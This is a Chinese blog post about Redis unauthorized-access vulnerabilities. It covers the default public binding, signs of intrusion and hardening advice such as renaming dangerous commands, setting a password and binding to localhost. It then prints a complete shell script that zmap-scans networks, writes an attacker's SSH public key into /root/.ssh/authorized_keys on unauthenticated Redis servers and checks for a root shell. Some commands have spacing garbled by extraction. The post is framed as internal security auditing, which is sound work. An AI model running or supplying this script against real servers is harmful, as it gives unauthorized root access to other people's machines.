redis 公网 安全_请务必注意 Redis 安全配置,否则将导致轻松被入侵

最新推荐文章于 2022-11-20 17:25:22 发布
最新推荐文章于 2022-11-20 17:25:22 发布
阅读量428 收藏 1
点赞数
文章标签: redis 公网 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39761195/article/details/111802210
版权
本文强调了Redis默认配置可能带来的安全风险,如公网暴露、未授权访问等,可能导致数据泄露和服务器被入侵。提供了修复建议,包括限制命令、设置密码、限制访问和以低权限运行。同时分享了一个用于扫描和检测Redis安全性的工具及其使用方法。
摘要由CSDN通过智能技术生成

改了下标题,不吸引人都没人看

一、前言

前段时间,在做内网影响程度评估的时候写了扫描利用小脚本,

扫描后统计发现,内网中 60% 开放了 redis6379 端口的主机处于可以被利用的危险状态,因为都是一些默认配置造成的

考虑到本社区大部分开发者都会使用 redis,特此分享下以便大家可以对自己公司的内网进行一个排查。

二、漏洞介绍

Redis 默认情况下,会绑定在 0.0.0.0:6379,这样将会将 Redis 服务暴露到公网上,如果在没有开启认证的情况下,可以导致任意用户在可以访问目标服务器的情况下未授权访问 Redis 以及读取 Redis 的数据。攻击者在未授权访问 Redis 的情况下可以利用 Redis 的相关方法,可以成功在 Redis 服务器上写入公钥,进而可以使用对应私钥直接登录目标服务器。

入侵特征:

Redis 可能执行过 FLUSHALL 方法,整个 Redis 数据库被清空

在 Redis 数据库中新建了一个名为 crackit(网上流传的命令指令)的键值对,内容为一个 SSH 公钥。

在 /root/.ssh 文件夹下新建或者修改了 authorized_keys 文件,内容为 Redis 生成的 db 文件,包含上述公钥

三、修复建议

1.禁止一些高危命令

修改 redis.conf 文件,添加

rename-command FLUSHALL ""

rename-command CONFIG ""

rename-command EVAL ""

来禁用远程修改 DB 文件地址

2.以低权限运行 Redis 服务

为 Redis 服务创建单独的用户和家目录,并且配置禁止登陆

3.为 Redis 添加密码验证

修改 redis.conf 文件,添加

requirepass mypassword

4.禁止外网访问 Redis

修改 redis.conf 文件,添加或修改

bind127.0.0.1

使得 Redis 服务只在当前主机可用

四、扫描工具

1 使用说明 #以Ubuntu为例

su

# Requirements

apt-get installredis-server expect zmap

git clone https://github.com/qingxp9/yyfexploit

cdyyfexploit/redis

# 扫描6379端口

# 如果你要扫内网,把/etc/zmap/zmap.conf中blacklist-file这一行注释掉

zmap -p 6379 10.0.0.0/8 -B 10M -o ip.txt

# Usage

./redis.sh ip.txt

最后,将会生成几个 txt 文件记录结果

其中:

runasroot.txt 表示 redis 无认证,且以 root 运行

noauth.txt 表示 redis 无认证,但以普通用户运行

rootshell.txt 已写入公钥,可直接以证书登录 root 用户

像这样:

ssh -i id_rsa root@x.x.x.x

2 工具源代码

就贴下代码吧,各位大牛请在家长陪同下观看

#!/bin/sh

if [ $#-eq 1 ]

thenip_list=$1

##create id_rsa

echo "****************************************Create id_rsa file"

expect -c "

spawn ssh-keygen -t rsa -f id_rsa -C\"yyf\"expect {\"*passphrase):\"{

exp_send\"\r\"exp_continue

}\"*again:\"{

exp_send\"\r\"}\"*y/n)?\"{

exp_send\"n\r\"}

}

expect eof

"

echo "\n\n****************************************Attack Targets"

touchnoauth.txt runasroot.txt rootshell.txt haveauth.txt

i=0

cat $ip_list | whilereadip

doi=`expr $i + 1`;

#write id_rsa.pub to remote

echo "*****${i}***connect to remote${ip}redis "

expect -c "

set timeout 3

spawn redis-cli -h$ipconfig set dir /root/.ssh/

expect {\"OK\"{ exit 0 }\"ERR Changing directory: Permission denied\"{ exit 1 }

timeout { exit 2 }\"(error) NOAUTH Authentication required\"{ exit 3 }

}

"

case $? in0) echo "run redis as root"

echo $ip >> noauth.txt

echo $ip >> runasroot.txt

;;

1) echo "not run redis as root\n\n\n"

echo $ip >> noauth.txt

continue

;;

2) echo "connect timeout\n\n\n"

continue

;;

3) echo "Have Auth\n\n\n"

echo $ip >> haveauth.txt

continue

;;

esac

(echo -e "\n\n"; catid_rsa.pub; echo -e "\n\n") > foo.txt

catfoo.txt | redis-cli -h $ip -x set1

redis-cli -h $ip config set dir /root/.ssh/

redis-cli -h $ip config setdbfilename "authorized_keys"

redis-cli save

#login test

echo "#try to login"

expect -c "

set timeout 5

spawn ssh -i id_rsa root@$ipecho\"yyf\"expect {\"*yes/no\"{ send\"yes\n\"}\"*password\"{ send\"\003\"; exit 1 }\"yyf\"{ exit 0 }

timeout { exit 2 }

}

exit 4

"

exitcode=$?

if [ $exitcode -eq 0 ]

thenecho "---------------${ip}is get root shell"

echo $ip >> rootshell.txt

fiecho "\n\n\n"

doneecho "##########Final Count##########"

wc -l $ip_list

echo "----------"

wc -l noauth.txt

wc -l runasroot.txt

wc -l rootshell.txt

echo "----------"

wc -l haveauth.txt

elseecho "usage: ./redis.sh ip.txt"

fi

五、相关参考

如果代码有写得不合理的地方,还望指出哈

weixin_39761195
关注
9-4 redis基线检查
weixin_43263566的博客
11-14 407
因此,在线上的Redis中,必须考虑禁用一些危险的命令,或者尽量避免任何人都可以使用这些命令。注意,在修改端口后,确保相应的防火墙或网络设备也进行了相应的调整,以允许新的端口通过。在执行操作时,建议记录所做的更改,并定期备份Redis配置文件和数据,以备恢复需要。在执行操作时,建议记录所做的更改,并定期备份Redis配置文件和数据,以备恢复需要。在执行操作时,建议记录所做的更改,并定期备份Redis配置文件和数据,以备恢复需要。在执行操作时,确保谨慎,并确认对应的文件路径和权限设置。
Redis 未授权访问缺陷可轻易导致系统被黑
top_gun_1的专栏
02-17 879
Sebug 布了 Redis 未授权访问缺陷的详细漏洞信息,这个 Redis 未授权访问缺陷可轻易导致系统被黑。详细内容看下文: 漏洞概要 Redis 默认情况下,会绑定在 0.0.0.0:6379,这样将会将Redis服务暴露到公网上,如果在没有开启认证的情况下,可以导致任意用户在可以访问目标服务器的情况下未授权访问Redis以及读取Redis的数据。攻击者在未授权访问Redis
redis 公网 安全_redis安全管理
weixin_39785165的博客
12-21 74
Redis默认没有密码,并且只能本机访问。使用redis-cli连上以后可以执行任意命令。如果要开放外网连接,则需要设置密码,同时禁用危险命令或者对危险命令进行改名。1.设置密码( 1 )打开Redis配置文件,搜索关键字“ requirepass ”( 2 )将“requirepass”这一行的注释去掉,这一行的“foobared”就是默认密码,可以改成自己的密码( 3 )保存配置文件并重启R...
redis 公网 安全_redis访问安全加固
weixin_39848970的博客
12-21 235
目录redis漏洞入侵特征安全隐患redis安全规范禁止root用户启动限制redis文件目录访问权限开启密码认证,设置复杂密码禁用或重命名危险命令设置允许监听地址,不要使用0.0.0.0尽量修改默认端口6379信任的内网运行,尽量避免有公网访问Redis漏洞Redis 默认情况下,会绑定在 0.0.0.0:6379,这样将会将 Redis 服务暴露到公网上,如果在没有开启认证的情况下,可以导致任...
哪种修复redis未授权访问漏洞的方法是相对不安全的_redis漏洞复现
weixin_39807691的博客
11-24 178
一、漏洞简介什么是redisredis是一个key-value存储系统。和Memcached类似,它支持存储的value类型相对更多,包括string(字符串)、list(链表)、set(集合)、zset(sorted set --有序集合)和hash(哈希类型)。这些数据类型都支持push/pop、add/remove及取交集并集和差集及更丰富的操作,而且这些操作都是原子性的。在此基础上,red...
宝塔 开启Redis外网访问权限
php菜鸟技术天地
12-14 1922
把127.0.0.1改为0.0.0.0 正式环境,一定要绑定服务器IP访问,就是不开放外网访问 警告:勿开启Redis外网访问权限,未限制访问IP的情况下极大概率导致服务器被入侵
redis导致java的cpu过高,redis 漏洞造成服务器被入侵-CPU飙升
weixin_39958631的博客
03-12 640
前言前几天在自己服务器上搭了redis,准备想着大展身手一番,昨天使用redis-cli命令的时候,10s后,显示进程已杀死。然后又试了几次,都是一样的结果,10s时间,进程被杀死。这个时候我还没发现事情的严重性。发现问题进程莫名被杀死,可能是cpu被占满,赶紧看了一下cpu。[root@vm_0_13_centos etc]# top果然如此,cpu被莫名的占满了。简单,根据pid杀死进程就行了...
Redis未授权访问漏洞引出的漏洞利用方式
最新发布
Chu_Jian_Xiong的博客
11-20 1354
redis未授权访问漏洞是一个由于redis服务版本较低其未设置登录密码导致的漏洞,攻击者可直接利用redis服务器的ip地址和端口完成redis服务器的远程登录,对目标服务器完成后续的控制和利用。
记一次愚蠢的Redis配置导致Linux服务器被恶意攻击
u012708900的博客
12-23 834
起因 之前Linux服务器上面一直启的Redis单机,并设置了密码。也没出现过问题。对安全这方面也不太敏感。 前天重新搭建了Redis集群(一主两从三哨兵),都只是做了最简单的配置,期初master配置中是有密码的,但是在配置slave时,没有添加masterauth配置项(因为无知,- -!),导致主从复制一直失败,索性就把master中的requirepass给注释掉了。再次重启主从复制成功了,哨兵的配置也成功启动,发现模拟故障转移也莫得问题,就认为万事大吉了。 经过 然而昨天中午的时候,收到了阿里云的
Redis 务必注意 Redis 安全配置,否则将导致轻松入侵
xulong5000的专栏
10-29 288
一、前言 前段时间,在做内网影响程度评估的时候写了扫描利用小脚本, 扫描后统计发现,内网中60%开放了redis6379端口的主机处于可以被利用的危险状态,因为都是一些默认配置造成的 考虑到本社区大部分开发者都会使用redis,特此分享下以便大家可以对自己司的内网进行一个排查。 二、漏洞介绍 Redis 默认情况下,会绑定在 0.0.0.0:6379,这样将会将 Redis 服务暴露到...
Redis安全注意事项
weixin_34247299的博客
11-30 501
本文简要介绍 Redis 安全相关的话题, 包括: Redis访问控制机制、Redis源码安全性, 外部输入可能触发的恶意攻击, 以及其他相关问题。 如果要反馈安全问题, 到 GitHub 上提出 issue, 当然, 如果需要私密通信, 使用文末提供的 GPG key。 Redis 总体安全模型 Redis 设想的运行环境...
redis 公网 安全_Redis出大事了 影响全球近10万服务器
weixin_39601641的博客
12-21 142
【IT168 资讯】Redis是一个开源的使用ANSIC语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API,其具有高性能、丰富的数据类型、原子性等优点,在特定的领域下,具有一定的不可代替性。但安全性上,Redis未授权访问问题是一直存在,知道创宇安全研究团队历史上也做过相关的应急,今日,又出现Redis未授权访问配合SSHkey文件被利用的情况,并有...
redis 公网 安全_redis外网连接的一些坑
weixin_39579726的博客
12-21 542
前言在使用阿里云和腾讯云的redis 可以减少很大的维护量。但是在我们的业务场景中遇到了一个情况,阿里和腾讯的redis均不支持外网访问。因此,正好帮人解决一个问题,就拿出来分享一下。阿呆的故事阿呆是从事编程工作半年,一直使用阿里云和腾讯云。司在要在全球部署服务器,由于运维成本高等问题,将所有服务采用了私有云+有云的模式。redis就架在了有云上,结果在部署到全球5个地区的时候,全球5个地区...
禁止使用root权限启动Redis服务
hanxiaozhang的博客
01-24 3872
这里写自定义目录标题欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 欢迎使用Markdown编辑器 你好! 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想学习如何使用Mar
公网Redis使用注意事项(Linux系统)
yudian1991的博客
03-14 6102
公网环境中使用redis一定要注意安全,否则很容易被攻击。自己的一台服务器安装了redis,由于没有安全意识(没有设置密码)导致被攻击,服务器的CPU和内存资源几乎被消耗殆尽,印象深刻
[redis]redis安全
新一的技术笔记
08-29 269
前言 关于redis安全,面试可能不会问。 但是lua脚本一般还是尽量不要用的~ 那么怎么尽量保证redis安全呢? 危险的指令 1. redis keys尽量不要用; 2. flushdb 和 flushall 会让redis的所有数据全部清空; 3. redis 可以提供 rename-command 指令可以将某些危险的指令,修改成特别的名称; 用来避免认为的误操作; 比如 rename-command flushall "" 端口安全 redis 默认端口 ,如果当前
阿里云CentOS7下Redis安全策略
qq_32966255的博客
09-11 376
1、禁止使用root用户启动(这里用admin用户启动redis服务) 1)切换到admin用户登录: su admin 2)复制redis.conf到非root用户home目录路径下: cp /usr/local/redis/redis.conf /home/admin/ 3)修改admin下的redis.conf文件: d...
Redis安全学习:基础配置与密码设置
"这篇文档是关于Redis安全的学习笔记,主要涉及Redis的基础知识、安装配置、数据类型、服务器配置以及安全相关的认证设置。" 在本文档中,作者分享了Redis安全学习经验,首先介绍了Redis的基础知识。Redis是一款...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值